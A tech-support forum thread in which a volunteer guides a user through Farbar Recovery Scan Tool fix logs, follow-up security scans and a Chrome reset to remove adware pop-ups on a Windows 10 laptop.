Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-09-25 21:36:08.416
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.403
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.392
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.382
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.367
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.358
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.346
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.337
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-4500U CPU @ 1.80GHz
Percentage of memory in use: 46%
Total physical RAM: 8104.27 MB
Available physical RAM: 4313.79 MB
Total Virtual: 11944.27 MB
Available Virtual: 7920 MB

==================== Drives ================================

Drive c: (Windows8_OS) (Fixed) (Total:220.47 GB) (Free:3.58 GB) NTFS
Drive d: (LENOVO) (Fixed) (Total:4 GB) (Free:3.95 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 238.5 GB) (Disk ID: 8061B931)

Partition: GPT.

==================== End of Addition.txt ============================

 

[Broni]

Download attached fixlist.txt file and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST(FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

[shivmister]

The program required me to restart the comp to complete its actions. Report is below.

Fix result of Farbar Recovery Scan Tool (x64) Version:04-10-2015
Ran by 007 (2017-03-03 22:19:39) Run:1
Running from C:\Users\007\Desktop
Loaded Profiles: 007 (Available Profiles: 007)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_221.dll [No File]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_221.dll [No File]
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
2015-11-07 22:31 - 2015-11-07 22:31 - 20320792 _____ (LastPass) C:\Program Files (x86)\Common Files\lpuninstall.exe
2015-11-07 19:57 - 2015-11-10 22:55 - 0012093 _____ () C:\Users\007\AppData\Roaming\AbsoluteReminder.xml
2016-01-03 21:17 - 2016-05-31 19:22 - 0000600 _____ () C:\Users\007\AppData\Local\PUTTY.RND
2016-09-23 22:04 - 2016-09-23 22:04 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
C:\Users\007\AppData\Local\Temp\dllnt_dump.dll
C:\Users\007\AppData\Local\Temp\iv_uninstall.exe
Task: {03FC901B-03A8-46EB-801A-6B41B55D19B8} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {0D2FDC56-13CB-486A-BA0A-4C648309A083} - \{087F0D47-047E-057E-7911-7879097A110A} -> No File <==== ATTENTION
Task: {287685D1-1882-4B11-8A3F-7DA00FFC31C2} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {36DF9173-D619-4613-85F9-64D7768DA80D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {8519140C-2AEF-4987-B1B6-075F6AAB760A} - \McAfee Remediation (Prepare) -> No File <==== ATTENTION
Task: {8794EAED-EC72-4A28-B331-B9F73019EBBE} - System32\Tasks\{6CD4C77C-DB7F-70D7-5EBC-8B31C233D9EF} => C:\ProgramData\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}\4630C17C-F19B-76D7-D36D-40D2603D087A.exe <==== ATTENTION
C:\ProgramData\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}\4630C17C-F19B-76D7-D36D-40D2603D087A.exe
Task: {8992DB38-9182-4B89-A615-A01B3F8C9F8F} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {A4497E84-87C6-4477-BDFD-E958CED4C0BE} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {AA1E3E10-D4BA-4681-8F7C-779A395428D0} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {C34D8C79-A216-4091-9D42-EC02CF67B018} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C55F594B-885F-4350-A465-7D88160B3801} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {CAFE5B51-DC10-4097-8DB7-704EE8566FA5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {CC1FFF22-A79B-469F-9BBD-E135EF0BE706} - \Adobe Flash Player PPAPI Notifier -> No File <==== ATTENTION
Task: {DE4F9764-9E73-4F9F-8F24-A6CA1FEE3248} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {E1935286-5CEB-4530-9F4D-F6427CD704B9} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {E6C59EFE-9151-4D35-BEA9-93E8415BF71B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
AlternateDataStreams: C:\BlackChipPoker:Win32App_1
AlternateDataStreams: C:\Program Files\Bonjour:Win32App_1
AlternateDataStreams: C:\Program Files\CCleaner:Win32App_1
AlternateDataStreams: C:\Program Files\Dolby Digital Plus:Win32App_1
AlternateDataStreams: C:\Program Files\FileZilla FTP Client:Win32App_1
AlternateDataStreams: C:\Program Files\Intel:Win32App_1
AlternateDataStreams: C:\Program Files\iTunes:Win32App_1
AlternateDataStreams: C:\Program Files\Microsoft Office 15:Win32App_1
AlternateDataStreams: C:\Program Files\Microsoft Silverlight:Win32App_1
AlternateDataStreams: C:\Program Files\WinRAR:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Apple Software Update:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\BlueStacks:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Bonjour:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\DVD Shrink:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\LastPass:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Magical Jelly Bean:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Microsoft Silverlight:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\mIRC:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Mozilla Firefox:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\MSXML 4.0:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\QuickTime Alternative:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\TeamViewer:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\VPN Unlimited:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\VUDUToGo:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\XnConvert:Win32App_1
AlternateDataStreams: C:\WINDOWS\SysWOW64:Win32App_1
AlternateDataStreams: C:\ProgramData\BlueStacks:Win32App_1
AlternateDataStreams: C:\ProgramData\Intel(R) Update Manager:Win32App_1
AlternateDataStreams: C:\ProgramData\regid.1991-06.com.microsoft:Win32App_1

*****************

"HKLM\SOFTWARE\Policies\Google" => key removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer" => key removed successfully
ibtsiva => Unable to stop service.
ibtsiva => service removed successfully
C:\Program Files (x86)\Common Files\lpuninstall.exe => moved successfully
C:\Users\007\AppData\Roaming\AbsoluteReminder.xml => moved successfully
C:\Users\007\AppData\Local\PUTTY.RND => moved successfully
Could not move "C:\ProgramData\DP45977C.lfl" => Scheduled to move on reboot.
C:\Users\007\AppData\Local\Temp\dllnt_dump.dll => moved successfully
C:\Users\007\AppData\Local\Temp\iv_uninstall.exe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{03FC901B-03A8-46EB-801A-6B41B55D19B8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{03FC901B-03A8-46EB-801A-6B41B55D19B8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0D2FDC56-13CB-486A-BA0A-4C648309A083}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0D2FDC56-13CB-486A-BA0A-4C648309A083}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{087F0D47-047E-057E-7911-7879097A110A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{287685D1-1882-4B11-8A3F-7DA00FFC31C2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{287685D1-1882-4B11-8A3F-7DA00FFC31C2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{36DF9173-D619-4613-85F9-64D7768DA80D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{36DF9173-D619-4613-85F9-64D7768DA80D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8519140C-2AEF-4987-B1B6-075F6AAB760A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8519140C-2AEF-4987-B1B6-075F6AAB760A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\McAfee Remediation (Prepare)" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8794EAED-EC72-4A28-B331-B9F73019EBBE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8794EAED-EC72-4A28-B331-B9F73019EBBE}" => key removed successfully
C:\WINDOWS\System32\Tasks\{6CD4C77C-DB7F-70D7-5EBC-8B31C233D9EF} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6CD4C77C-DB7F-70D7-5EBC-8B31C233D9EF}" => key removed successfully
"C:\ProgramData\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}\4630C17C-F19B-76D7-D36D-40D2603D087A.exe" => File/Folder not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8992DB38-9182-4B89-A615-A01B3F8C9F8F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8992DB38-9182-4B89-A615-A01B3F8C9F8F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A4497E84-87C6-4477-BDFD-E958CED4C0BE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A4497E84-87C6-4477-BDFD-E958CED4C0BE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AA1E3E10-D4BA-4681-8F7C-779A395428D0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AA1E3E10-D4BA-4681-8F7C-779A395428D0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C34D8C79-A216-4091-9D42-EC02CF67B018}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C34D8C79-A216-4091-9D42-EC02CF67B018}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C55F594B-885F-4350-A465-7D88160B3801}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C55F594B-885F-4350-A465-7D88160B3801}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-Weekend" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CAFE5B51-DC10-4097-8DB7-704EE8566FA5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CAFE5B51-DC10-4097-8DB7-704EE8566FA5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CC1FFF22-A79B-469F-9BBD-E135EF0BE706}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CC1FFF22-A79B-469F-9BBD-E135EF0BE706}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player PPAPI Notifier" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DE4F9764-9E73-4F9F-8F24-A6CA1FEE3248}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DE4F9764-9E73-4F9F-8F24-A6CA1FEE3248}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E1935286-5CEB-4530-9F4D-F6427CD704B9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1935286-5CEB-4530-9F4D-F6427CD704B9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E6C59EFE-9151-4D35-BEA9-93E8415BF71B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E6C59EFE-9151-4D35-BEA9-93E8415BF71B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
C:\BlackChipPoker => ":Win32App_1" ADS removed successfully.
C:\Program Files\Bonjour => ":Win32App_1" ADS removed successfully.
C:\Program Files\CCleaner => ":Win32App_1" ADS removed successfully.
C:\Program Files\Dolby Digital Plus => ":Win32App_1" ADS removed successfully.
C:\Program Files\FileZilla FTP Client => ":Win32App_1" ADS removed successfully.
C:\Program Files\Intel => ":Win32App_1" ADS removed successfully.
C:\Program Files\iTunes => ":Win32App_1" ADS removed successfully.
C:\Program Files\Microsoft Office 15 => ":Win32App_1" ADS removed successfully.
C:\Program Files\Microsoft Silverlight => ":Win32App_1" ADS removed successfully.
C:\Program Files\WinRAR => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\Apple Software Update => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\BlueStacks => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\Bonjour => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\DVD Shrink => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\LastPass => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\Magical Jelly Bean => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\Microsoft Silverlight => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\mIRC => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\Mozilla Firefox => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\MSXML 4.0 => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\QuickTime Alternative => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\TeamViewer => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\VPN Unlimited => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\VUDUToGo => ":Win32App_1" ADS removed successfully.
C:\Program Files (x86)\XnConvert => ":Win32App_1" ADS removed successfully.
C:\WINDOWS\SysWOW64 => ":Win32App_1" ADS removed successfully.
C:\ProgramData\BlueStacks => ":Win32App_1" ADS removed successfully.
C:\ProgramData\Intel(R) Update Manager => ":Win32App_1" ADS removed successfully.
C:\ProgramData\regid.1991-06.com.microsoft => ":Win32App_1" ADS removed successfully.

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 2017-03-03 22:20:37)

C:\ProgramData\DP45977C.lfl => Is moved successfully

==== End of Fixlog 22:20:39 ====

 

[Broni]

Last scans...

Download Security Check from here or here and save it to your Desktop.

• Double-click SecurityCheck.exe
• Follow the onscreen instructions inside of the black box.
• A Notepad document should open automatically called checkup.txt; please post the contents of that document.

NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access the Internet, allow it to do so.
NOTE 2. SecurityCheck may produce some false warning(s), so leave the results reading to me.
NOTE 3. If you receive UNSUPPORTED OPERATING SYSTEM! ABORTED! message restart computer and Security Check should run

Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.
Make sure the following options are checked:

• Internet Services
• Windows Firewall
• System Restore
• Security Center
• Windows Update
• Windows Defender
• Other Services

Press "Scan".
It will create a log (FSS.txt) in the same directory the tool is run.
Please copy and paste the log to your reply.

Download Temp File Cleaner (TFC)
Alternate download: http://www.itxassociates.com/OT-Tools/TFC.exe

• Double click on TFC.exe to run the program.
• Click on Start button to begin cleaning process.
• TFC will close all running programs, and it may ask you to restart computer.

Download Sophos Free Virus Removal Tool and save it to your desktop.

• Double click the icon and select Run
• Click Next
• Select I accept the terms in this license agreement, then click Next twice
• Click Install
• Click Finish to launch the program
• Once the virus database has been updated click Start Scanning
• If any threats are found click Details, then View log file... (bottom left hand corner)
• Copy and paste the results in your reply
• Close the Notepad document, close the Threat Details screen, then click Start cleanup
• Click Exit to close the program

 

[shivmister]

Currently running sophos.

Security Check Log
Results of screen317's Security Check version 1.014 --- 12/23/15
x64 (UAC is enabled)
Internet Explorer 11
``````````````Antivirus/Firewall Check:``````````````
Windows Firewall Enabled!
Windows Defender
[size=1]WMI entry may not exist for antivirus; attempting automatic update.[/size]
`````````Anti-malware/Other Utilities Check:`````````
Java 8 Update 101
Java SE Development Kit 8 Update 101
Java version 32-bit out of Date!
Adobe Flash Player 24.0.0.221
Mozilla Firefox (50.1.0)
Google Chrome (56.0.2924.87)
Google Chrome (SetupMetrics...)
````````Process Check: objlist.exe by Laurent````````
Windows Defender MSMpEng.exe
Malwarebytes Anti-Malware mbamservice.exe
Malwarebytes Anti-Malware mbamtray.exe
Windows Defender MSASCuiL.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C: %
````````````````````End of Log``````````````````````

-----------------------------------------------------------------------------------------
FSS Log

Farbar Service Scanner Version: 27-01-2016
Ran by 007 (administrator) on 03-03-2017 at 22:31:25
Running from "C:\Users\007\Downloads"
Microsoft Windows 10 Home (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.


Windows Firewall:
=============

Firewall Disabled Policy:
==================


System Restore:
============

System Restore Policy:
========================


Security Center:
============


Windows Update:
============

Windows Autoupdate Disabled Policy:
============================


Windows Defender:
==============

Other Services:
==============


File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed


**** End of log ****
------------------------------------------------------------------------------------------

TFC

2766mb cleaned

------------------------------------------------------

 

[shivmister]

No threats were found with Sophos

 

[shivmister]

I wanted to let you know that the pop ups have not stopped. They are just as bad. I thnk malwarebytes had them at bay...I kept noticing pop ups of sites being blocked from malware bytes. I tried stopping the application and see what would happen. That was a mistake. I turned it back on. I am having trouble accessing this thread to even post this message. I eneded up typeing it into notepad and pasting it in. Let me know of your suggestion. I can do a reformat if need be, but I dont know how to get the product key for my version of office and windows. I tried magical jelly bean and it only gave me windows product NOT office. Any suggestions? Or if you have any more tricks let me know. Im afraid if I try and back everything up im going to back up the virus and Im going to be in trouble all over again.

 

[Broni]

If only Chrome is affected I posted before what to do...

Reset Chrome...
Click on "Customize and control Google Chrome":

Click "Settings" then "Show advanced settings" at the bottom of the screen.
Click "Reset browser settings" button.
Restart Chrome.

If the above didn't help....

Reinstall Chrome...
If you want to save your bookmarks...
How to Backup Bookmarks in Google Chrome
If you want to save your passwords as well see here: http://www.intowindows.com/how-to-backup-saved-passwords-in-google-chrome-browser/

• Close all Chrome windows and tabs.
• Go to the Start menu > Control Panel. (Windows 8 users: Learn how to access the Control Panel)
• Click Programs and Features.
• Double-click Google Chrome.
• Click Uninstall from the confirmation dialog. Delete your user profile information, like your browser preferences, bookmarks, and history, by selecting the "Also delete your browsing data" checkbox.

Install fresh copy.

 

[shivmister]

Alright give me a few days to see what happens. Ill leave notifications from malware bytes on so I know if there is anythig that is getting blocked. Ill report back accordingly.

 

[Broni]

I suggest you don't wait.
Waiting and using compromised browser may bring more bad stuff to your computer.
...and we'll have to start all over.

 

[shivmister]

I should have been more explicit. I will follow your instructions you provided and see what happens. I've already reset the browser settings.

 

[Broni]

I see